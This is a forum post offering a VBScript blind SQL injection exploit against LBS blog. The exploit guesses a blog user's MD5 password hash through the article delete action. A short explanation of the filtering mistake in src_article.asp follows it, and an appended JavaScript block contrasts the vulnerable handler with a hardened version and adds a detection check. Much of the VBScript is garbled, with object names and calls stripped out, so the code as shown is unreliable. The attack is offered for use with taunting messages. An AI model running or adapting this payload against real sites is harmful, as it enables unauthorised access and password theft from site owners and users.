Haha, it's just a proven vulnerability.
The exploit is as follows; save it as a .vbs file and then test it against the program yourself.
'From Sword Heart
'============================================================================
'Instructions for use:
' In the command prompt:
' The blog path of the website to be attacked Valid article id The blog user password to be cracked
'like:
' /blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP object is used to open the target URL
Dim TargetURL 'Destination URL
Dim userid,articleid 'blog username
Dim TempStr 'Storing the obtained part of MD5 password
Dim CharHex 'Defines hexadecimal characters
Dim charset
Set oArgs =
If < 1 Then Call ShowUsage()
Set olbsXML = createObject("")
'Supplement full target website
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & ""
articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
"LBS blog All version Exploit"&vbcrlf
"By Jianxin"&vbcrlf
"/ Just For fun :)"&vbcrlf&vbcrlf
"+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'Function name: main
'Function function: main program, inject to obtain blog user password
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_)='" & TempStr&CharHex(SubOffset) &"'"
OpenURL = TargetURL
"Post",OpenURL, False, "", ""
"Content-Type","application/x-www-form-urlencoded"
"act=delete&deleted")<>0 Then
'"The blog user does not exist or the information filled in is incorrect" is the error marker; if it comes back, the guessed MD5 character is wrong
'If you end up with an MD5 value of 0000000000000000, adjust the error marker
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
"+Crack now:"&TempStr
Exit for
Else
vbcrlf & "Something error" & vbcrlf
vbcrlf & GetPage& vbcrlf
End If
next
Next
vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub
'============================================
'Function name: BytesToBstr
'Function function: convert content in XMLHTTP object into GB2312 encoding
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("")
= 1
=3
body
= 0
= 2
= "GB2312"
BytesToBstr =
set objstream = nothing
End Function
'============================
'Function name: ShowUsage
'Function function: usage prompts
'============================
Sub ShowUsage()
"LBS blog Exploit" & vbcrlf & " By Loveshell/Sword Heart"
"Usage:"& vbcrlf & " CScript " & &" TargetURL BlogName"
"Example:"& vbcrlf & " CScript " & &" / 1 1"
""
End Sub
Vulnerability Description:
In src_article.asp:
......
input["log_id"]=(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
("log_id, log_authorID, log_catID","log_id"]);
strError=false;
}
......
The filter is applied to log_id, but it is id that actually gets used, haha :)
Then what?
Code in class/
= function(strselect, strwhere){
var tmpA=("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
(tmpA[0]);
return true;
}else{
return false;
}
}
Needless to say what that does, haha. But the trigger conditions still have to be satisfiable!
function articledelete(){
if(["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;
By default the guest has delete permission. Although a permission check is made later, the injection has already happened by then, and we simply use that later check as the signal for the injection, haha
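As an added illustration of the parameter mix-up described above (this is not LBS blog's own code; sanitizeId is a hypothetical stand-in for the page's elided sanitiser, and the request objects are constructed), here is the vulnerable handler shape beside a hardened one that validates the parameter actually placed in the WHERE clause:

```javascript
// The src_article.asp bug: the sanitiser runs over input["log_id"], while
// input["id"] is what is concatenated into "... FROM [blog_Article] where ...".

// Hypothetical whitelist helper standing in for the elided sanitiser:
// keeps only digits, so a clean numeric id passes through unchanged.
function sanitizeId(value) {
  return String(value == null ? "" : value).replace(/[^0-9]/g, "");
}

// Vulnerable shape: filter log_id, then build the query from id.
function buildWhereVulnerable(input) {
  input["log_id"] = sanitizeId(input["log_id"]);
  if (!input["id"]) return null;          // mirrors the page's !input["id"] check
  return "log_id=" + input["id"];         // the untouched id reaches the query
}

// Hardened shape: validate the value that is actually used, and reject
// anything that is not a plain positive integer instead of stripping characters.
function buildWhereFixed(input) {
  const raw = String(input["id"] == null ? "" : input["id"]);
  if (!/^[1-9][0-9]*$/.test(raw)) return null;   // invalid_parameter path
  return "log_id=" + parseInt(raw, 10);
}

// Detection helper for review or logging: does a built WHERE clause carry
// anything beyond a bare numeric id?
function looksInjected(where) {
  return where !== null && !/^log_id=[0-9]+$/.test(where);
}

// Constructed sample requests: a normal one and one with a tautology-style
// suffix (shape only) of the kind the writeup relies on.
const cleanRequest = { id: "1", log_id: "1" };
const taintedRequest = { id: "1 and 1=1", log_id: "1" };

console.log(buildWhereVulnerable({ ...taintedRequest }),   // log_id=1 and 1=1
            buildWhereFixed({ ...taintedRequest }),        // null
            looksInjected(buildWhereVulnerable({ ...cleanRequest })));  // false
```

Validating the parameter that reaches the query closes this particular hole; a parameterised ADODB.Command would be the stronger fix, since it does not depend on the WHERE string ever being clean.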